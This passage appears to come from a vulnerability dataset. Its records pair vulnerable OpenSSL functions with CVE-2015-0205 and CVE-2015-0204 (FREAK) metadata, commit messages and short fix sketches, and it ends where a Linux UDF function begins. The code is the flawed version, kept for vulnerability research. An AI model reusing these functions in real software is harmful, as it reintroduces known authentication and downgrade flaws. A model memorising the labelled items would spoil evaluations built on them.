int type=0,i,j;
X509 *peer;
const EVP_MD *md = NULL;
EVP_MD_CTX mctx;
EVP_MD_CTX_init(&mctx);
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CERT_VRFY_A,
SSL3_ST_SR_CERT_VRFY_B,
-1,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
if (s->session->peer != NULL)
{
peer=s->session->peer;
pkey=X509_get_pubkey(peer);
type=X509_certificate_type(peer,pkey);
}
else
{
peer=NULL;
pkey=NULL;
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_VERIFY)
{
s->s3->tmp.reuse_message=1;
if ((peer != NULL) && (type & EVP_PKT_SIGN))
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_MISSING_VERIFY_MESSAGE);
goto f_err;
}
ret=1;
goto end;
}
if (peer == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_NO_CLIENT_CERT_RECEIVED);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
if (!(type & EVP_PKT_SIGN))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_SIGNATURE_FOR_NON_SIGNING_CERTIFICATE);
al=SSL_AD_ILLEGAL_PARAMETER;
goto f_err;
}
if (s->s3->change_cipher_spec)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_CCS_RECEIVED_EARLY);
al=SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
/* we now have a signature that we need to verify */
p=(unsigned char *)s->init_msg;
/* Check for broken implementations of GOST ciphersuites */
/* If key is GOST and n is exactly 64, it is bare
* signature without length field */
if (n==64 && (pkey->type==NID_id_GostR3410_94 ||
pkey->type == NID_id_GostR3410_2001) )
{
i=64;
}
else
{
if (SSL_USE_SIGALGS(s))
{
int rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
{
al = SSL_AD_INTERNAL_ERROR;
goto f_err;
}
else if (rv == 0)
{
al = SSL_AD_DECODE_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
n2s(p,i);
n-=2;
if (i > n)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_LENGTH_MISMATCH);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
}
j=EVP_PKEY_size(pkey);
if ((i > j) || (n > j) || (n <= 0))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_WRONG_SIGNATURE_SIZE);
al=SSL_AD_DECODE_ERROR;
goto f_err;
}
if (SSL_USE_SIGALGS(s))
{
long hdatalen = 0;
void *hdata;
hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
if (hdatalen <= 0)
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_INTERNAL_ERROR);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "Using TLS 1.2 with client verify alg %s\n",
EVP_MD_name(md));
#endif
if (!EVP_VerifyInit_ex(&mctx, md, NULL)
|| !EVP_VerifyUpdate(&mctx, hdata, hdatalen))
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY, ERR_R_EVP_LIB);
al=SSL_AD_INTERNAL_ERROR;
goto f_err;
}
if (EVP_VerifyFinal(&mctx, p , i, pkey) <= 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA)
{
i=RSA_verify(NID_md5_sha1, s->s3->tmp.cert_verify_md,
MD5_DIGEST_LENGTH+SHA_DIGEST_LENGTH, p, i,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_RSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_DSA
if (pkey->type == EVP_PKEY_DSA)
{
j=DSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.dsa);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,SSL_R_BAD_DSA_SIGNATURE);
goto f_err;
}
}
else
#endif
#ifndef OPENSSL_NO_ECDSA
if (pkey->type == EVP_PKEY_EC)
{
j=ECDSA_verify(pkey->save_type,
&(s->s3->tmp.cert_verify_md[MD5_DIGEST_LENGTH]),
SHA_DIGEST_LENGTH,p,i,pkey->pkey.ec);
if (j <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
#endif
if (pkey->type == NID_id_GostR3410_94 || pkey->type == NID_id_GostR3410_2001)
{ unsigned char signature[64];
int idx;
EVP_PKEY_CTX *pctx = EVP_PKEY_CTX_new(pkey,NULL);
EVP_PKEY_verify_init(pctx);
if (i!=64) {
fprintf(stderr,"GOST signature length is %d",i);
}
for (idx=0;idx<64;idx++) {
signature[63-idx]=p[idx];
}
j=EVP_PKEY_verify(pctx,signature,64,s->s3->tmp.cert_verify_md,32);
EVP_PKEY_CTX_free(pctx);
if (j<=0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,
SSL_R_BAD_ECDSA_SIGNATURE);
goto f_err;
}
}
else
{
SSLerr(SSL_F_SSL3_GET_CERT_VERIFY,ERR_R_INTERNAL_ERROR);
al=SSL_AD_UNSUPPORTED_CERTIFICATE;
goto f_err;
}
ret=1;
if (0)
{
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
}
end:
if (s->s3->handshake_buffer)
{
BIO_free(s->s3->handshake_buffer);
s->s3->handshake_buffer = NULL;
s->s3->flags &= ~TLS1_FLAGS_KEEP_HANDSHAKE;
}
EVP_MD_CTX_cleanup(&mctx);
EVP_PKEY_free(pkey);
return(ret);
}
| 212,984,391,365,092,660,000,000,000,000,000,000,000 | None | null | [
"CWE-310"
] | CVE-2015-0205 | The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support. | https://nvd.nist.gov/vuln/detail/CVE-2015-0205 |
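The flaw sits in the skip path near the top of the function: CertificateVerify was allowed to be absent whenever the client key could not sign, which a DH client certificate satisfies. The corrected rule, reduced to one predicate (stand-in parameter):

#include <stddef.h>

/* Only a client that sent no certificate at all may omit
 * CertificateVerify; the key type is irrelevant to the decision. */
static int may_skip_cert_verify(const void *peer_cert)
{
	return peer_cert == NULL;
}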
1,586 | openssl | ce325c60c74b0fa784f5872404b722e120e5cab0 | https://github.com/openssl/openssl | https://github.com/openssl/openssl/commit/ce325c60c74b0fa784f5872404b722e120e5cab0 | Only allow ephemeral RSA keys in export ciphersuites.
OpenSSL clients would tolerate temporary RSA keys in non-export
ciphersuites. It also had an option SSL_OP_EPHEMERAL_RSA which
enabled this server side. Remove both options as they are a
protocol violation.
Thanks to Karthikeyan Bhargavan for reporting this issue.
(CVE-2015-0204)
Reviewed-by: Matt Caswell <matt@openssl.org> | 1 | int ssl3_get_key_exchange(SSL *s)
{
#ifndef OPENSSL_NO_RSA
unsigned char *q,md_buf[EVP_MAX_MD_SIZE*2];
#endif
EVP_MD_CTX md_ctx;
unsigned char *param,*p;
int al,j,ok;
long i,param_len,n,alg_k,alg_a;
EVP_PKEY *pkey=NULL;
const EVP_MD *md = NULL;
#ifndef OPENSSL_NO_RSA
RSA *rsa=NULL;
#endif
#ifndef OPENSSL_NO_DH
DH *dh=NULL;
#endif
#ifndef OPENSSL_NO_ECDH
EC_KEY *ecdh = NULL;
BN_CTX *bn_ctx = NULL;
EC_POINT *srvr_ecpoint = NULL;
int curve_nid = 0;
int encoded_pt_len = 0;
#endif
EVP_MD_CTX_init(&md_ctx);
/* use same message size as in ssl3_get_certificate_request()
* as ServerKeyExchange message may be skipped */
n=s->method->ssl_get_message(s,
SSL3_ST_CR_KEY_EXCH_A,
SSL3_ST_CR_KEY_EXCH_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
if (s->s3->tmp.message_type != SSL3_MT_SERVER_KEY_EXCHANGE)
{
/*
* Can't skip server key exchange if this is an ephemeral
* ciphersuite.
*/
if (alg_k & (SSL_kDHE|SSL_kECDHE))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
al = SSL_AD_UNEXPECTED_MESSAGE;
goto f_err;
}
#ifndef OPENSSL_NO_PSK
/* In plain PSK ciphersuite, ServerKeyExchange can be
omitted if no identity hint is sent. Set
session->sess_cert anyway to avoid problems
later.*/
if (alg_k & SSL_kPSK)
{
s->session->sess_cert=ssl_sess_cert_new();
if (s->ctx->psk_identity_hint)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = NULL;
}
#endif
s->s3->tmp.reuse_message=1;
return(1);
}
param=p=(unsigned char *)s->init_msg;
if (s->session->sess_cert != NULL)
{
#ifndef OPENSSL_NO_RSA
if (s->session->sess_cert->peer_rsa_tmp != NULL)
{
RSA_free(s->session->sess_cert->peer_rsa_tmp);
s->session->sess_cert->peer_rsa_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_DH
if (s->session->sess_cert->peer_dh_tmp)
{
DH_free(s->session->sess_cert->peer_dh_tmp);
s->session->sess_cert->peer_dh_tmp=NULL;
}
#endif
#ifndef OPENSSL_NO_ECDH
if (s->session->sess_cert->peer_ecdh_tmp)
{
EC_KEY_free(s->session->sess_cert->peer_ecdh_tmp);
s->session->sess_cert->peer_ecdh_tmp=NULL;
}
#endif
}
else
{
s->session->sess_cert=ssl_sess_cert_new();
}
/* Total length of the parameters including the length prefix */
param_len=0;
alg_a=s->s3->tmp.new_cipher->algorithm_auth;
al=SSL_AD_DECODE_ERROR;
#ifndef OPENSSL_NO_PSK
if (alg_k & SSL_kPSK)
{
char tmp_id_hint[PSK_MAX_IDENTITY_LEN+1];
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
/* Store PSK identity hint for later use, hint is used
* in ssl3_send_client_key_exchange. Assume that the
* maximum length of a PSK identity hint can be as
* long as the maximum length of a PSK identity. */
if (i > PSK_MAX_IDENTITY_LEN)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_DATA_LENGTH_TOO_LONG);
goto f_err;
}
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_BAD_PSK_IDENTITY_HINT_LENGTH);
goto f_err;
}
param_len += i;
/* If received PSK identity hint contains NULL
* characters, the hint is truncated from the first
* NULL. p may not be ending with NULL, so create a
* NULL-terminated string. */
memcpy(tmp_id_hint, p, i);
memset(tmp_id_hint+i, 0, PSK_MAX_IDENTITY_LEN+1-i);
if (s->ctx->psk_identity_hint != NULL)
OPENSSL_free(s->ctx->psk_identity_hint);
s->ctx->psk_identity_hint = BUF_strdup(tmp_id_hint);
if (s->ctx->psk_identity_hint == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, ERR_R_MALLOC_FAILURE);
goto f_err;
}
p+=i;
n-=param_len;
}
else
#endif /* !OPENSSL_NO_PSK */
#ifndef OPENSSL_NO_SRP
if (alg_k & SSL_kSRP)
{
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_N_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.N=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (1 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 1;
i = (unsigned int)(p[0]);
p++;
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_S_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.s=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_B_LENGTH);
goto f_err;
}
param_len += i;
if (!(s->srp_ctx.B=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!srp_verify_server_param(s, &al))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SRP_PARAMETERS);
goto f_err;
}
/* We must check if there is a certificate */
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
}
else
#endif /* !OPENSSL_NO_SRP */
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if ((rsa=RSA_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_MODULUS_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->n=BN_bin2bn(p,i,rsa->n)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_E_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->e=BN_bin2bn(p,i,rsa->e)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
/* this should be because we are using an export cipher */
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
else
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
s->session->sess_cert->peer_rsa_tmp=rsa;
rsa=NULL;
}
#else /* OPENSSL_NO_RSA */
if (0)
;
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & SSL_kDHE)
{
if ((dh=DH_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_P_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->p=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_PUB_KEY_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->pub_key=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dh), 0, dh))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
/* else anonymous DH, so no certificate or pkey. */
s->session->sess_cert->peer_dh_tmp=dh;
dh=NULL;
}
else if ((alg_k & SSL_kDHr) || (alg_k & SSL_kDHd))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER);
goto f_err;
}
#endif /* !OPENSSL_NO_DH */
#ifndef OPENSSL_NO_ECDH
else if (alg_k & SSL_kECDHE)
{
EC_GROUP *ngroup;
const EC_GROUP *group;
if ((ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Extract elliptic curve parameters and the
* server's ephemeral ECDH public key.
* Keep accumulating lengths of various components in
* param_len and make sure it never exceeds n.
*/
/* XXX: For now we only support named (not generic) curves
* and the ECParameters in this case is just three bytes. We
* also need one byte for the length of the encoded point
*/
param_len=4;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
/* Check curve is one of our preferences, if not server has
* sent an invalid curve. ECParameters is 3 bytes.
*/
if (!tls1_check_curve(s, p, 3))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_CURVE);
goto f_err;
}
if ((curve_nid = tls1_ec_curve_id2nid(*(p + 2))) == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS);
goto f_err;
}
ngroup = EC_GROUP_new_by_curve_name(curve_nid);
if (ngroup == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (EC_KEY_set_group(ecdh, ngroup) == 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
EC_GROUP_free(ngroup);
group = EC_KEY_get0_group(ecdh);
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
al=SSL_AD_EXPORT_RESTRICTION;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto f_err;
}
p+=3;
/* Next, get the encoded ECPoint */
if (((srvr_ecpoint = EC_POINT_new(group)) == NULL) ||
((bn_ctx = BN_CTX_new()) == NULL))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encoded_pt_len = *p; /* length of encoded point */
p+=1;
if ((encoded_pt_len > n - param_len) ||
(EC_POINT_oct2point(group, srvr_ecpoint,
p, encoded_pt_len, bn_ctx) == 0))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_ECPOINT);
goto f_err;
}
param_len += encoded_pt_len;
n-=param_len;
p+=encoded_pt_len;
/* The ECC/TLS specification does not mention
* the use of DSA to sign ECParameters in the server
* key exchange message. We do support RSA and ECDSA.
*/
if (0) ;
#ifndef OPENSSL_NO_RSA
else if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#endif
#ifndef OPENSSL_NO_ECDSA
else if (alg_a & SSL_aECDSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
#endif
/* else anonymous ECDH, so no certificate or pkey. */
EC_KEY_set_public_key(ecdh, srvr_ecpoint);
s->session->sess_cert->peer_ecdh_tmp=ecdh;
ecdh=NULL;
BN_CTX_free(bn_ctx);
bn_ctx = NULL;
EC_POINT_free(srvr_ecpoint);
srvr_ecpoint = NULL;
}
else if (alg_k)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto f_err;
}
#endif /* !OPENSSL_NO_ECDH */
/* p points to the next byte, there are 'n' bytes left */
/* if it was signed, check the signature */
if (pkey != NULL)
{
if (SSL_USE_SIGALGS(s))
{
int rv;
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
goto err;
else if (rv == 0)
{
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
else
md = EVP_sha1();
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
n-=2;
j=EVP_PKEY_size(pkey);
/* Check signature length. If n is 0 then signature is empty */
if ((i != n) || (n > j) || (n <= 0))
{
/* wrong packet length */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_SIGNATURE_LENGTH);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
int num;
unsigned int size;
j=0;
q=md_buf;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,param,param_len);
EVP_DigestFinal_ex(&md_ctx,q,&size);
q+=size;
j+=size;
}
i=RSA_verify(NID_md5_sha1, md_buf, j, p, n,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#endif
{
EVP_VerifyInit_ex(&md_ctx, md, NULL);
EVP_VerifyUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,param,param_len);
if (EVP_VerifyFinal(&md_ctx,p,(int)n,pkey) <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
}
else
{
/* aNULL, aSRP or kPSK do not need public keys */
if (!(alg_a & (SSL_aNULL|SSL_aSRP)) && !(alg_k & SSL_kPSK))
{
/* Might be wrong key type, check it */
if (ssl3_check_cert_and_algorithm(s))
/* Otherwise this shouldn't happen */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
/* still data left over */
if (n != 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_EXTRA_DATA_IN_MESSAGE);
goto f_err;
}
}
EVP_PKEY_free(pkey);
EVP_MD_CTX_cleanup(&md_ctx);
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
EVP_PKEY_free(pkey);
#ifndef OPENSSL_NO_RSA
if (rsa != NULL)
RSA_free(rsa);
#endif
#ifndef OPENSSL_NO_DH
if (dh != NULL)
DH_free(dh);
#endif
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
EC_POINT_free(srvr_ecpoint);
if (ecdh != NULL)
EC_KEY_free(ecdh);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
| 19,329,931,296,243,780,000,000,000,000,000,000,000 | None | null | [
"CWE-310"
] | CVE-2015-0204 | The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. | https://nvd.nist.gov/vuln/detail/CVE-2015-0204 |
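A minimal sketch of the check this commit adds at the top of the SSL_kRSA branch of ssl3_get_key_exchange(), reusing only identifiers already visible in the function above (illustrative, not the verbatim patch): a temporary RSA key is rejected outright unless the negotiated ciphersuite is genuinely export-grade.

	if (alg_k & SSL_kRSA)
		{
		/* A temporary RSA key is only legal in an export
		 * ciphersuite; anywhere else it is a protocol violation
		 * (the FREAK downgrade vector). */
		if (!SSL_C_IS_EXPORT(s->s3->tmp.new_cipher))
			{
			al = SSL_AD_UNEXPECTED_MESSAGE;
			SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE, SSL_R_UNEXPECTED_MESSAGE);
			goto f_err;
			}
		/* existing parsing of rsa->n and rsa->e continues here */
		}

With this in place a man-in-the-middle can no longer splice an EXPORT_RSA ServerKeyExchange into a handshake that negotiated a strong RSA ciphersuite.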
1,593 | linux | e237ec37ec154564f8690c5bd1795339955eeef9 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/e237ec37ec154564f8690c5bd1795339955eeef9 | udf: Check component length before reading it
Check that length specified in a component of a symlink fits in the
input buffer we are reading. Also properly ignore component length for
component types that do not use it. Otherwise we read memory after end
of buffer for corrupted udf image.
Reported-by: Carl Henrik Lunde <chlunde@ping.uio.no>
CC: stable@vger.kernel.org
Signed-off-by: Jan Kara <jack@suse.cz> | 1 | static int udf_pc_to_char(struct super_block *sb, unsigned char *from,
int fromlen, unsigned char *to, int tolen)
{
struct pathComponent *pc;
int elen = 0;
int comp_len;
